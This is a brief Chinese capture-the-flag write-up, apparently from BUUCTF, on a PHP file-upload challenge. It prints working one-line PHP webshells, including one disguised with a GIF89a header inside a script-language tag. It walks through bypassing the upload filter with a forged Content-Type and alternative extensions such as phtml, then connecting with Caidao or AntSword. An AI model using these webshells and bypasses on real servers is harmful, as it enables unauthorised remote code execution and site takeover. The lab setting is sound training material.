一個檔案上次功能點
二話不說先上傳一個一句話木馬,
<?php @eval($_POST['123'])?>
發現被攔截,并顯示not image
那我們進行抓包修改Content-Type欄位進行繞過
發現php后綴被攔截,所以我們用急性的后綴在進行繞過,
phtml、pht、php、php3、php4、php5
發現phtml可以正常繞過
發現<?被檢測出來,進行攔截了,所以我們需要替換我們的一句話木馬,
GIF89a? <script language="php">eval($_REQUEST[123])</script> #替換之后的木馬
然后就上次成功了
訪問upload目錄
http://d8ebcdeb-8147-4d90-8db1-dd41c9a69068.node4.buuoj.cn:81/upload/
然后用菜刀、蟻劍鏈接,鏈接地址
http://d8ebcdeb-8147-4d90-8db1-dd41c9a69068.node4.buuoj.cn:81/upload/shell.phtml
在根目錄下找到flag
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/296075.html
標籤:其他
